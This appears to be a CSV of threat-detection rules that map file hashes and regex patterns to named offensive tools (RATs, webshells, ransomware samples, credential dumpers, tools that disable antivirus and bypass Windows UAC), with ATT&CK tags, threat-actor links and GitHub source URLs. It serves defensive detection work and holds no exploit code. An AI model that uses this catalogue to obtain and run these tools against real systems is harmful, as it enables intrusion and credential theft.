"*67d07f5020768f37186d4ca33145eef3e117bd5bd53d4976d55eb314bf919f06*",".{0,1000}67d07f5020768f37186d4ca33145eef3e117bd5bd53d4976d55eb314bf919f06.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28200"
"*67d132f09b67e82cb54b941814c28737974165bcec5139909ed455fe97f2ab41*",".{0,1000}67d132f09b67e82cb54b941814c28737974165bcec5139909ed455fe97f2ab41.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","#filehash","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","28201"
"*67d5e8f4f9a37b6519c10921eea1306d9a33bb20f3b9f1b35cb22f3b00b179db*",".{0,1000}67d5e8f4f9a37b6519c10921eea1306d9a33bb20f3b9f1b35cb22f3b00b179db.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28202"
"*67d9b4b35c02a19ab364ad19e1972645eb98e24dcd6f1715d2a26229deb2ccf5*",".{0,1000}67d9b4b35c02a19ab364ad19e1972645eb98e24dcd6f1715d2a26229deb2ccf5.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","#filehash","N/A","10","","N/A","","","","28203"
"*67e0def5a9c36e5ecef1fb735955c76efe3133ad7d64a35bd5228c856edc9a94*",".{0,1000}67e0def5a9c36e5ecef1fb735955c76efe3133ad7d64a35bd5228c856edc9a94.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","28204"
"*67e582bc87c9c0d604ac539ba02c954f56f0ba59fc33c6aa52c145674561d811*",".{0,1000}67e582bc87c9c0d604ac539ba02c954f56f0ba59fc33c6aa52c145674561d811.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28205"
"*67e7e9e8a9ae97ff4a2f1878746be4c10af64f43867d2e9ead31470145c689b8*",".{0,1000}67e7e9e8a9ae97ff4a2f1878746be4c10af64f43867d2e9ead31470145c689b8.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","28206"
"*67ed30524444d6941dc4697249242b34db97c3245bca48fffd1899c027dcb410*",".{0,1000}67ed30524444d6941dc4697249242b34db97c3245bca48fffd1899c027dcb410.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28207"
"*67f6f13cd32457711eb5171e7f87942319edd25e5463ac770e7666d71b1382b7*",".{0,1000}67f6f13cd32457711eb5171e7f87942319edd25e5463ac770e7666d71b1382b7.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","28208"
"*67f8634f21a97d71f8baba63156aa6a50918fbd9df054c23b28138ceaa39ba34*",".{0,1000}67f8634f21a97d71f8baba63156aa6a50918fbd9df054c23b28138ceaa39ba34.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","28209"
"*67f8ab8f84f3f38e993bee454179fe95008c62fa6c44b385306c3617718e4204*",".{0,1000}67f8ab8f84f3f38e993bee454179fe95008c62fa6c44b385306c3617718e4204.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28210"
"*68080b2cbfd4488f96e0c315ea7e8bf6204de010a05eeb2da621f78caa7254b9*",".{0,1000}68080b2cbfd4488f96e0c315ea7e8bf6204de010a05eeb2da621f78caa7254b9.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","28212"
"*68115c6e039363be3b80e416ed462d97f8c763af800237b1fa183cca1180bac5*",".{0,1000}68115c6e039363be3b80e416ed462d97f8c763af800237b1fa183cca1180bac5.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","28213"
"*68176e317f4294f7ed8cac8f270a3fcfb1a03000831ea6594c374d2318e976c6*",".{0,1000}68176e317f4294f7ed8cac8f270a3fcfb1a03000831ea6594c374d2318e976c6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28214"
"*68218101d6c83cd34c23c9afc7ca2c7fa13a1bc8138481232a9410c5da4a9386*",".{0,1000}68218101d6c83cd34c23c9afc7ca2c7fa13a1bc8138481232a9410c5da4a9386.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28217"
"*6824586e095fec0e58ee872ecf5108b370bd8713987988510aacf3793cbe1114*",".{0,1000}6824586e095fec0e58ee872ecf5108b370bd8713987988510aacf3793cbe1114.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","28218"
"*683bcd5fce3d71c8fd2c0e4c8a5a7254033638848035b25f04d82fe44a992e0d*",".{0,1000}683bcd5fce3d71c8fd2c0e4c8a5a7254033638848035b25f04d82fe44a992e0d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28222"
"*683ed7b04ebf596dbfdd30456656bed8c1a8f8ee4b8eec411ad8bce572e10240*",".{0,1000}683ed7b04ebf596dbfdd30456656bed8c1a8f8ee4b8eec411ad8bce572e10240.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","28223"
"*6844B720CFF6E079879333D6FDA944D3D3EA78878B48AFFD45AC81700BBA0F5E*",".{0,1000}6844B720CFF6E079879333D6FDA944D3D3EA78878B48AFFD45AC81700BBA0F5E.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","28225"
"*68538ddd64073d5e6b9edf092c7a364c0380734826a00bc10e12a7cdc370410a*",".{0,1000}68538ddd64073d5e6b9edf092c7a364c0380734826a00bc10e12a7cdc370410a.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","28226"
"*685cc5e58579e5f5a176e2be355398579f46cd64dfd0a0e82edf12316fc33b5b*",".{0,1000}685cc5e58579e5f5a176e2be355398579f46cd64dfd0a0e82edf12316fc33b5b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28227"
"*685e710dd49930b791f10fe68c46a2eae0ecdd93191ceb459425b338a0980844*",".{0,1000}685e710dd49930b791f10fe68c46a2eae0ecdd93191ceb459425b338a0980844.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","0","#filehash","https://github.com/TrashDono/MegaMedusa/blob/155b922adbe6598ba7553058a1515d607bd6e940/MegaMedusa.js","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","28228"
"*686c2fd56c44f2621950ffcebad071e91db115a57f2a4a72e27dcf65c94190ed*",".{0,1000}686c2fd56c44f2621950ffcebad071e91db115a57f2a4a72e27dcf65c94190ed.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","28230"
"*6870cfc153e4d1478d4a3907036f32b7ebb1183810375475a436debb584fd8d3*",".{0,1000}6870cfc153e4d1478d4a3907036f32b7ebb1183810375475a436debb584fd8d3.{0,1000}","offensive_tool_keyword","mitmproxy","An interactive. SSL-capable man-in-the-middle proxy for HTTP with a console interface","T1557 - T1553 - T1003 - T1556 - T1563","TA0002 - TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/mitmproxy/mitmproxy","1","0","#filehash","N/A","10","10","38814","4162","2025-04-22T13:29:41Z","2010-02-16T04:10:13Z","28231"
"*6881a17bb0b124e295cfbf2fae1165babe35a3dda065dd246dad52b107ef3252*",".{0,1000}6881a17bb0b124e295cfbf2fae1165babe35a3dda065dd246dad52b107ef3252.{0,1000}","offensive_tool_keyword","Dispossessor","Bruteforce tools used by Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","28235"
"*688332c4667e6d6e605356fbf205017a7dc9a86731d9fd95beb2562df3bc754b*",".{0,1000}688332c4667e6d6e605356fbf205017a7dc9a86731d9fd95beb2562df3bc754b.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","28236"
"*68893940dc6f3230bb1e6fccf92c698bd7445de283e0d5739336b8b7e471f6a9*",".{0,1000}68893940dc6f3230bb1e6fccf92c698bd7445de283e0d5739336b8b7e471f6a9.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","28237"
"*688dc9d39588279c2872574aceba8950660824d3f0b91c1c50e1be065b891f77*",".{0,1000}688dc9d39588279c2872574aceba8950660824d3f0b91c1c50e1be065b891f77.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28238"
"*68a231b29bc22ff2f956bbfc0215f5c74880da394ddd484144a8ef1013c696d1*",".{0,1000}68a231b29bc22ff2f956bbfc0215f5c74880da394ddd484144a8ef1013c696d1.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","28241"
"*68af509fd4c4e58e7cc291316b72dacc5bf2861340ac83da5fc1287a38f0e615*",".{0,1000}68af509fd4c4e58e7cc291316b72dacc5bf2861340ac83da5fc1287a38f0e615.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28242"
"*68c44d30bb996caf2202e1664ab8dfc5ddb6d20b1b01f06864c58df3ab06225a*",".{0,1000}68c44d30bb996caf2202e1664ab8dfc5ddb6d20b1b01f06864c58df3ab06225a.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28248"
"*68c964dff60cd2699cca31430d7ebd494cfc9442a7351512316a4467e19266cd*",".{0,1000}68c964dff60cd2699cca31430d7ebd494cfc9442a7351512316a4467e19266cd.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","28249"
"*68cfcef00c7be228c8c10ec35874bbbf3e3a6eec33ce3c2697af0aa8bcf844d3*",".{0,1000}68cfcef00c7be228c8c10ec35874bbbf3e3a6eec33ce3c2697af0aa8bcf844d3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28250"
"*68d8cccac7dcacea5a989ca47bd46f153d368cec93991fa8e3a1c950fec75508*",".{0,1000}68d8cccac7dcacea5a989ca47bd46f153d368cec93991fa8e3a1c950fec75508.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28252"
"*68d9f28535974326ecf0a8746d0c6e8c7ccf4ac464f083eb375f998f2eb52ab9*",".{0,1000}68d9f28535974326ecf0a8746d0c6e8c7ccf4ac464f083eb375f998f2eb52ab9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28253"
"*68db60666c1168286b8cc21049d8cfe4*",".{0,1000}68db60666c1168286b8cc21049d8cfe4.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","#filehash","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","28254"
"*68ddd5703d6205313549d3828eeca64f383f297c43f65398f9a30637c07ef153*",".{0,1000}68ddd5703d6205313549d3828eeca64f383f297c43f65398f9a30637c07ef153.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","Collection of self-made Red Team tools","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","0","#filehash","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","28255"
"*68e3b0998d4950b98379f5c42a3d1e317af5c3ff22878e9b569a563cf28d78e5*",".{0,1000}68e3b0998d4950b98379f5c42a3d1e317af5c3ff22878e9b569a563cf28d78e5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28256"
"*68e3ce34f0d904e715ea8471373abc3632bfe4fd945e1a4976baa18d003dff7a*",".{0,1000}68e3ce34f0d904e715ea8471373abc3632bfe4fd945e1a4976baa18d003dff7a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28257"
"*68e8b94f99f449c2b03f908cc77399831c145d289e18f18fe21cffc4010021ca*",".{0,1000}68e8b94f99f449c2b03f908cc77399831c145d289e18f18fe21cffc4010021ca.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28259"
"*68f5943f82cca6e744c5a2f28bf3f7b77109007c5e215e99b1587b20d0f1bae0*",".{0,1000}68f5943f82cca6e744c5a2f28bf3f7b77109007c5e215e99b1587b20d0f1bae0.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","28260"
"*68f88c6f39dea0b385af37b957b9a55ad766a079d53a03deaee5a44790ce62cf*",".{0,1000}68f88c6f39dea0b385af37b957b9a55ad766a079d53a03deaee5a44790ce62cf.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","28261"
"*6905595a21a2a1d669fb80a6fd3f97db4692d98ad9e33eae64466c7cfbaabb8b*",".{0,1000}6905595a21a2a1d669fb80a6fd3f97db4692d98ad9e33eae64466c7cfbaabb8b.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","28262"
"*69058ca0c4eada431047c0376db8a4728feffbacebbb9578e59f4c9113a342ca*",".{0,1000}69058ca0c4eada431047c0376db8a4728feffbacebbb9578e59f4c9113a342ca.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","28263"
"*690a75c3c6d282677102073f6bc64c4f8a13771aa052497ba02ca19a6de56f8a*",".{0,1000}690a75c3c6d282677102073f6bc64c4f8a13771aa052497ba02ca19a6de56f8a.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","28264"
"*690b998d1f9a9f3b67f8a78771f9c88ad5455c2b0150c92b2960fa69f196f660*",".{0,1000}690b998d1f9a9f3b67f8a78771f9c88ad5455c2b0150c92b2960fa69f196f660.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","28265"
"*690e0cc55db7e3d5de7a62b4a20fdfae8c7a66c1218d57efe9d432521c031ecb*",".{0,1000}690e0cc55db7e3d5de7a62b4a20fdfae8c7a66c1218d57efe9d432521c031ecb.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28267"
